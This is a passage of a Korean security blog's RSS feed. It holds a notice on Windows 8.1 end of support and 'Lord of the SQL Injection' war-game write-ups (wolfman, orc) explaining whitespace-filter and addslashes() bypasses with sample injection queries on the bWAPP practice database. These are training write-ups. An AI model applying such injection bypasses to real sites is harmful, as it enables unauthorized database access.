/&gt;&amp;nbsp;4.&amp;nbsp;악성코드&amp;nbsp;탐지&amp;nbsp;예방&amp;nbsp;활동 &lt;br /&gt;&lt;br /&gt;Ⅴ.&amp;nbsp;주요&amp;nbsp;시스템&amp;nbsp;및&amp;nbsp;관리PC&amp;nbsp;점검표&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;참고&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;a href=&quot;https://krcert.or.kr/data/guideView.do?bulletin_writing_sequence=67099&amp;amp;queryString=YnVsbGV0aW5fd3JpdGluZ19zZXF1ZW5jZT02NzA5OQ==&quot;&gt;https://krcert.or.kr/data/guideView.do?bulletin_writing_sequence=67099&amp;amp;queryString=YnVsbGV0aW5fd3JpdGluZ19zZXF1ZW5jZT02NzA5OQ==&lt;/a&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>Code::보안공지</category>
      <category>가이드</category>
      <category>공동주택</category>
      <category>공동주택 홈네트워크</category>
      <category>매뉴얼</category>
      <category>시스템 보안관리 안내서</category>
      <category>안내서</category>
      <author>태군 코드</author>
      <guid isPermaLink="true">https://securitycode.tistory.com/269</guid>
      <comments>https://securitycode.tistory.com/269#entry269comment</comments>
      <pubDate>Fri, 6 Jan 2023 09:47:31 +0900</pubDate>
    </item>
    <item>
      <title>보안공지 : MS 윈도우 8.1 기술지원 종료 관련 보안 권고</title>
      <link>https://securitycode.tistory.com/268</link>
      <description>&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;□&amp;nbsp;개요&lt;/b&gt; &lt;br /&gt;&amp;nbsp;o&amp;nbsp;MS社는&amp;nbsp;2023년&amp;nbsp;1월&amp;nbsp;10일자로&amp;nbsp;Windows&amp;nbsp;8.1&amp;nbsp;제품의&amp;nbsp;기술지원이&amp;nbsp;종료&amp;nbsp;[1] &lt;br /&gt;&amp;nbsp;o&amp;nbsp;윈도우&amp;nbsp;운영체제의&amp;nbsp;기술지원이&amp;nbsp;종료되면&amp;nbsp;신규&amp;nbsp;보안&amp;nbsp;취약점&amp;nbsp;및&amp;nbsp;오류에&amp;nbsp;대한&amp;nbsp;보안&amp;nbsp;업데이트를&amp;nbsp;제공하지&amp;nbsp;않으므로&amp;nbsp;최신&amp;nbsp;운영체제로&amp;nbsp;업그레이드&amp;nbsp;및&amp;nbsp;교체를&amp;nbsp;권고 &lt;br /&gt;&amp;nbsp; &lt;br /&gt;&lt;b&gt;□&amp;nbsp;기술지원&amp;nbsp;종료&amp;nbsp;대상&lt;/b&gt; &lt;br /&gt;&amp;nbsp;o&amp;nbsp;(2023년&amp;nbsp;1월&amp;nbsp;10일&amp;nbsp;종료예정)&amp;nbsp;Windows&amp;nbsp;8.1 &lt;br /&gt;&lt;br /&gt;&lt;b&gt;□&amp;nbsp;대응&amp;nbsp;방안&lt;/b&gt; &lt;br /&gt;&amp;nbsp;o&amp;nbsp;기술지원이&amp;nbsp;종료되는&amp;nbsp;제품&amp;nbsp;이용자는&amp;nbsp;보안업데이트가&amp;nbsp;제공되는&amp;nbsp;최신&amp;nbsp;윈도우&amp;nbsp;제품으로&amp;nbsp;업그레이드하거나&amp;nbsp;최신버전의&amp;nbsp;대체&amp;nbsp;운영체제로&amp;nbsp;교체하는&amp;nbsp;것을&amp;nbsp;권고 &lt;br /&gt;&amp;nbsp;&amp;nbsp;-&amp;nbsp;윈도우&amp;nbsp;제품은&amp;nbsp;Windows&amp;nbsp;11&amp;nbsp;이상의&amp;nbsp;최신버전&amp;nbsp;업그레이드 &lt;br /&gt;&amp;nbsp;&amp;nbsp;-&amp;nbsp;대체&amp;nbsp;운영체제&amp;nbsp;사용&amp;nbsp;희망&amp;nbsp;시&amp;nbsp;참고사이트[2][3][4][5][6][7][8]을&amp;nbsp;통해&amp;nbsp;최신버전으로&amp;nbsp;교체 &lt;br /&gt;&lt;br /&gt;&lt;b&gt;□&amp;nbsp;문의사항&lt;/b&gt; &lt;br /&gt;&amp;nbsp;o&amp;nbsp;Microsoft&amp;nbsp;고객센터&amp;nbsp;:&amp;nbsp;1577-9700 &lt;br /&gt;&amp;nbsp;o&amp;nbsp;한국인터넷진흥원&amp;nbsp;사이버민원센터:&amp;nbsp;국번없이&amp;nbsp;118 &lt;br /&gt;&amp;nbsp; &lt;br /&gt;[참고사이트] &lt;br /&gt;[1]&amp;nbsp;&lt;a href=&quot;https://support.microsoft.com/ko-kr/windows/windows-8-1-%EC%A7%80%EC%9B%90%EC%9D%80-2023%EB%85%84-1%EC%9B%94-10%EC%9D%BC%EC%97%90-%EC%A2%85%EB%A3%8C%EB%90%A9%EB%8B%88%EB%8B%A4-3cfd4cde-f611-496a-8057-923fba401e93&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://support.microsoft.com/ko-kr/windows/windows-8-1-%EC%A7%80%EC%9B%90%EC%9D%80-2023%EB%85%84-1%EC%9B%94-10%EC%9D%BC%EC%97%90-%EC%A2%85%EB%A3%8C%EB%90%A9%EB%8B%88%EB%8B%A4-3cfd4cde-f611-496a-8057-923fba401e93&lt;/a&gt; &lt;br /&gt;[2]&amp;nbsp;&lt;a href=&quot;https://redhat.com/ko&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://redhat.com/ko&lt;/a&gt; &lt;br /&gt;[3]&amp;nbsp;&lt;a href=&quot;https://centos.org&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://centos.org&lt;/a&gt; &lt;br /&gt;[4]&amp;nbsp;&lt;a href=&quot;https://getfedora.org&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://getfedora.org&lt;/a&gt; &lt;br /&gt;[5]&amp;nbsp;&lt;a href=&quot;https://tizen.org&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://tizen.org&lt;/a&gt; &lt;br /&gt;[6]&amp;nbsp;&lt;a href=&quot;https://ubuntu.com&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://ubuntu.com&lt;/a&gt; &lt;br /&gt;[7]&amp;nbsp;&lt;a href=&quot;https://hamonikr.org&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://hamonikr.org&lt;/a&gt; &lt;br /&gt;[8]&amp;nbsp;&lt;a href=&quot;https://linuxmint.com&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://linuxmint.com&lt;/a&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;[9] &lt;a href=&quot;https://krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=67102&quot;&gt;https://krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=67102&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>Code::보안공지</category>
      <category>KISA</category>
      <category>MS 윈도우 8.1 기술지원 종료</category>
      <category>보안 권고</category>
      <category>보안공지</category>
      <author>태군 코드</author>
      <guid isPermaLink="true">https://securitycode.tistory.com/268</guid>
      <comments>https://securitycode.tistory.com/268#entry268comment</comments>
      <pubDate>Fri, 6 Jan 2023 09:29:49 +0900</pubDate>
    </item>
    <item>
      <title>[LOS] Lord of the SQL Injection - wolfman</title>
      <link>https://securitycode.tistory.com/267</link>
      <description>&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #ee2323;&quot;&gt;허용받지&amp;nbsp;않은&amp;nbsp;서비스&amp;nbsp;대상으로&amp;nbsp;해킹을&amp;nbsp;시도하는&amp;nbsp;행위는&amp;nbsp;범죄&amp;nbsp;행위입니다.&lt;/span&gt;&amp;nbsp;해킹을&amp;nbsp;시도할&amp;nbsp;때에&amp;nbsp;발생하는&amp;nbsp;법적인&amp;nbsp;책임은&amp;nbsp;그것을&amp;nbsp;행한&amp;nbsp;사용자에게&amp;nbsp;있다는&amp;nbsp;것을&amp;nbsp;명심하시기&amp;nbsp;바랍니다. &lt;/b&gt;&lt;br /&gt;&lt;br /&gt;조금&amp;nbsp;더&amp;nbsp;구체적인&amp;nbsp;내용들은&amp;nbsp;&lt;a href=&quot;https://securitycode.tistory.com/261&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;[LOS]&amp;nbsp;Lord&amp;nbsp;of&amp;nbsp;the&amp;nbsp;SQL&amp;nbsp;Injection&amp;nbsp;-&amp;nbsp;gremlin&lt;/a&gt;&amp;nbsp;문제를&amp;nbsp;풀면서&amp;nbsp;작성해&amp;nbsp;두었고,&amp;nbsp;빠진&amp;nbsp;부분이나&amp;nbsp;필요한&amp;nbsp;부분들에&amp;nbsp;대해서는&amp;nbsp;조금씩&amp;nbsp;추가하면서&amp;nbsp;작성하도록&amp;nbsp;하겠습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;629&quot; data-origin-height=&quot;315&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/5qfw6/btrVoG7tjiI/wduKdqMlKT6ObdC1DCgeLK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/5qfw6/btrVoG7tjiI/wduKdqMlKT6ObdC1DCgeLK/img.png&quot; data-alt=&quot;Lord of the SQL Injection - wolfman&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/5qfw6/btrVoG7tjiI/wduKdqMlKT6ObdC1DCgeLK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F5qfw6%2FbtrVoG7tjiI%2FwduKdqMlKT6ObdC1DCgeLK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;620&quot; height=&quot;310&quot; data-origin-width=&quot;629&quot; data-origin-height=&quot;315&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;Lord of the SQL Injection - wolfman&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;Lord&amp;nbsp;of&amp;nbsp;the&amp;nbsp;SQL&amp;nbsp;Injection&amp;nbsp;-&amp;nbsp;wolfman&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;preg_match : porb _ . ( ) 필터링이 되어 있고 i 옵션을 통하여 대소문자를 구분하지 않음 pw='필터링값'이 있을 경우 &quot;No Hack ~_~&quot; 문구를 출력합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;preg_match : 공백문자가 필터링이 되어 있고 i 옵션을 통하여 대소문자를 구분하지 않음 pw='필터링값'이 있을 경우 &quot;No whitespace ~_~&quot; 문구를 출력합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;해당 문제는 쿼리를 이용하여 id값에 &quot;admin&quot;이 존재하는지 확인하면 간단히 풀리는 문제입니다. 하지만 기존 문제와는 다르게 공백문자를 필터링하고 있어 스페이스바를 입력할 경우 &quot;No whitespace ~_~&quot; 문구를 출력합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;SQL Injection 공격에서는 공백 문자를 우회하는 방법은 여러가지가 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;공백 문자를 우회할수 있는 ASCII 코드표&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;616&quot; data-origin-height=&quot;256&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bAL5xX/btrVpfPolTJ/vkigkSwKJM6Oq7AyK1pme0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bAL5xX/btrVpfPolTJ/vkigkSwKJM6Oq7AyK1pme0/img.png&quot; data-alt=&quot;참고 ASCII&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bAL5xX/btrVpfPolTJ/vkigkSwKJM6Oq7AyK1pme0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbAL5xX%2FbtrVpfPolTJ%2FvkigkSwKJM6Oq7AyK1pme0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;620&quot; height=&quot;258&quot; data-origin-width=&quot;616&quot; data-origin-height=&quot;256&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;참고 ASCII&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;해당 문제는 bWAPP를 통하여 예시로 들어주는 부분과 ASCII코드표를 참조하여 직접 한번 풀어 보시기를 추천드립니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;681&quot; data-origin-height=&quot;311&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dBoGTW/btrVoG0MNmT/78avQj125TQCEScecB4qo0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dBoGTW/btrVoG0MNmT/78avQj125TQCEScecB4qo0/img.png&quot; data-alt=&quot;bWAPP DB&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dBoGTW/btrVoG0MNmT/78avQj125TQCEScecB4qo0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdBoGTW%2FbtrVoG0MNmT%2F78avQj125TQCEScecB4qo0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;650&quot; height=&quot;297&quot; data-origin-width=&quot;681&quot; data-origin-height=&quot;311&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;bWAPP DB&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;bWAPP의 DB를 통하여 먼저 설명을 드리도록 하겠습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;select login from users;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;- bWAPP DB의 users 테이블의 login 컬럼을 출력하였습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;select&amp;nbsp;login&amp;nbsp;from&amp;nbsp;users&amp;nbsp;where&amp;nbsp;login='bee'&lt;span style=&quot;color: #333333;&quot;&gt;&amp;nbsp;&lt;/span&gt;and&amp;nbsp;password=''&amp;nbsp;or&amp;nbsp;login='test01';&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;- bWAPP DB의 users 테이블의 login 컬럼에서 login='bee'이고 password='' 이거나 login='test01'을 출력,&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;login='bee' and password='' 조건은 패스워드 값이 없기 때문에 그다음의 OR 조건을 통하여 'test01' 값을 출력하게 됩니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;즉 위의 조건의 쿼리는 다름의 쿼리문과 같다고 생각하시면 됩니다. select login from users where login='test01';&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;870&quot; data-origin-height=&quot;441&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cLe6nF/btrVtGkN64J/Ska0cZUF9Zsn3xazKKl7z1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cLe6nF/btrVtGkN64J/Ska0cZUF9Zsn3xazKKl7z1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cLe6nF/btrVtGkN64J/Ska0cZUF9Zsn3xazKKl7z1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcLe6nF%2FbtrVtGkN64J%2FSka0cZUF9Zsn3xazKKl7z1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;380&quot; data-origin-width=&quot;870&quot; data-origin-height=&quot;441&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;저는 /**/ 주석 처리 부분을 이용하여 공백을 우회하였습니다. 여기서 보시면 URL에 값 입력 시 인코딩 되어&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;16진수 27 = ' , 23 = # 으로 표시가 되는 것을 알 수 있습니다. 해당 부분과 위의 &quot;참고 ASCII&quot; 표의 내용을 확인하여 다른 방법으로 풀어 보시기를 추천드립니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;참고&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;a href=&quot;https://ko.wikipedia.org/wiki/ASCII&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://ko.wikipedia.org/wiki/ASCII&lt;/a&gt;&lt;/p&gt;</description>
      <category>Code::War Game/los.rubiya.kr</category>
      <category>lord of sql injection</category>
      <category>Lord of SQLInjection</category>
      <category>Lord of the SQL Injection wolfman</category>
      <category>Los</category>
      <category>sql injection</category>
      <author>태군 코드</author>
      <guid isPermaLink="true">https://securitycode.tistory.com/267</guid>
      <comments>https://securitycode.tistory.com/267#entry267comment</comments>
      <pubDate>Thu, 5 Jan 2023 13:55:49 +0900</pubDate>
    </item>
    <item>
      <title>[LOS] Lord of the SQL Injection - orc</title>
      <link>https://securitycode.tistory.com/266</link>
      <description>&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #ee2323;&quot;&gt;허용받지&amp;nbsp;않은&amp;nbsp;서비스&amp;nbsp;대상으로&amp;nbsp;해킹을&amp;nbsp;시도하는&amp;nbsp;행위는&amp;nbsp;범죄&amp;nbsp;행위입니다.&lt;/span&gt;&amp;nbsp;해킹을&amp;nbsp;시도할&amp;nbsp;때에&amp;nbsp;발생하는&amp;nbsp;법적인&amp;nbsp;책임은&amp;nbsp;그것을&amp;nbsp;행한&amp;nbsp;사용자에게&amp;nbsp;있다는&amp;nbsp;것을&amp;nbsp;명심하시기&amp;nbsp;바랍니다.&lt;/b&gt; &lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;조금&amp;nbsp;더&amp;nbsp;구체적인&amp;nbsp;내용들은&amp;nbsp;&lt;a href=&quot;https://securitycode.tistory.com/261&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;[LOS]&amp;nbsp;Lord&amp;nbsp;of&amp;nbsp;the&amp;nbsp;SQL&amp;nbsp;Injection&amp;nbsp;-&amp;nbsp;gremlin&lt;/a&gt;&amp;nbsp;문제를&amp;nbsp;풀면서&amp;nbsp;작성해&amp;nbsp;두었고,&amp;nbsp;빠진&amp;nbsp;부분이나&amp;nbsp;필요한&amp;nbsp;부분들에&amp;nbsp;대해서는&amp;nbsp;조금씩&amp;nbsp;추가하면서&amp;nbsp;작성하도록&amp;nbsp;하겠습니다. &lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;616&quot; data-origin-height=&quot;360&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/Lh3L5/btrVmfVIf4Z/O0o6a9o7iT02JXUO1A8vqK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/Lh3L5/btrVmfVIf4Z/O0o6a9o7iT02JXUO1A8vqK/img.png&quot; data-alt=&quot;Lord of the SQL Injection - orc&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/Lh3L5/btrVmfVIf4Z/O0o6a9o7iT02JXUO1A8vqK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FLh3L5%2FbtrVmfVIf4Z%2FO0o6a9o7iT02JXUO1A8vqK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;650&quot; height=&quot;380&quot; data-origin-width=&quot;616&quot; data-origin-height=&quot;360&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;Lord of the SQL Injection - orc&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;[LOS]&amp;nbsp;Lord&amp;nbsp;of&amp;nbsp;the&amp;nbsp;SQL&amp;nbsp;Injection&amp;nbsp;-&amp;nbsp;orc&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;preg_match : porb _ . ( ) 필터링이 되어 있고 i 옵션을 통하여 대소문자를 구분하지 않음 pw='필터링값'이 있을 경우 &quot;No Hack ~_~&quot; 문구를 출력합니다. &lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;addslashes() 함수 : 이스케이프해야 하는 문자 앞에 백슬래시가(\) 추가된 문자열을 반환합니다. 이러한 문자는 다음과 같습니다. &lt;br /&gt;&lt;br /&gt;작은따옴표(&amp;nbsp;') &lt;br /&gt;큰따옴표(&amp;nbsp;&quot;) &lt;br /&gt;백슬래시(&amp;nbsp;\) &lt;br /&gt;NUL(NUL&amp;nbsp;바이트)&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;DB 조회, 삭제, 삽입 등 쿼터 같은 특수문자를 넣을 경우 오류를 발생시킬 수 있으며, SQL Injection 등 쿼리 공격을 방지하기 위해 사용합니다. 하지만 addslashes() 함수를 사용하여도 충분히 우회가 가능합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;예시)&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;$str&amp;nbsp;=&amp;nbsp;&quot;Is&amp;nbsp;your&amp;nbsp;name&amp;nbsp;O&lt;span style=&quot;color: #ee2323;&quot;&gt;'&lt;/span&gt;Reilly?&quot; &lt;br /&gt;Outputs: Is your name O&lt;span style=&quot;color: #ee2323;&quot;&gt;\'&lt;/span&gt;Reilly?&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;이처럼 문자에 쿼터 같은 특수문자가 들어갈경우 백슬래시(\)를 앞에 붙여 특수문자를 일반문자열로 바꿔 줍니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;391&quot; data-origin-height=&quot;159&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/b3orV4/btrVjn1npYF/lSUlKSVqLQVmKMldsHbu4K/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/b3orV4/btrVjn1npYF/lSUlKSVqLQVmKMldsHbu4K/img.png&quot; data-alt=&quot;bWAPP DB&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/b3orV4/btrVjn1npYF/lSUlKSVqLQVmKMldsHbu4K/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fb3orV4%2FbtrVjn1npYF%2FlSUlKSVqLQVmKMldsHbu4K%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;340&quot; height=&quot;138&quot; data-origin-width=&quot;391&quot; data-origin-height=&quot;159&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;bWAPP DB&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;bWAPP DB에서 users 테이블의 login 컬럼을 조회한 결과 값입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;961&quot; data-origin-height=&quot;107&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/sq2Tl/btrVjjrjstY/VBeQQIjxPEIgVKctcLEvTK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/sq2Tl/btrVjjrjstY/VBeQQIjxPEIgVKctcLEvTK/img.png&quot; data-alt=&quot;bWAPP DB&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/sq2Tl/btrVjjrjstY/VBeQQIjxPEIgVKctcLEvTK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fsq2Tl%2FbtrVjjrjstY%2FVBeQQIjxPEIgVKctcLEvTK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;850&quot; height=&quot;95&quot; data-origin-width=&quot;961&quot; data-origin-height=&quot;107&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;bWAPP DB&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;bWAPP DB users 테이블의 login 컬럼에서 login 값이 test'01인 값을 쿼리 하였습니다. 쿼터(') 특수문자가 중간에 들어가서 SQL 에러가 표시되는 것을 알 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;471&quot; data-origin-height=&quot;37&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dnBn8q/btrVkXOAgWu/KBfFKeE9tfM5Ia914uPJL0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dnBn8q/btrVkXOAgWu/KBfFKeE9tfM5Ia914uPJL0/img.png&quot; data-alt=&quot;bWAPP DB&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dnBn8q/btrVkXOAgWu/KBfFKeE9tfM5Ia914uPJL0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdnBn8q%2FbtrVkXOAgWu%2FKBfFKeE9tfM5Ia914uPJL0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;470&quot; height=&quot;37&quot; data-origin-width=&quot;471&quot; 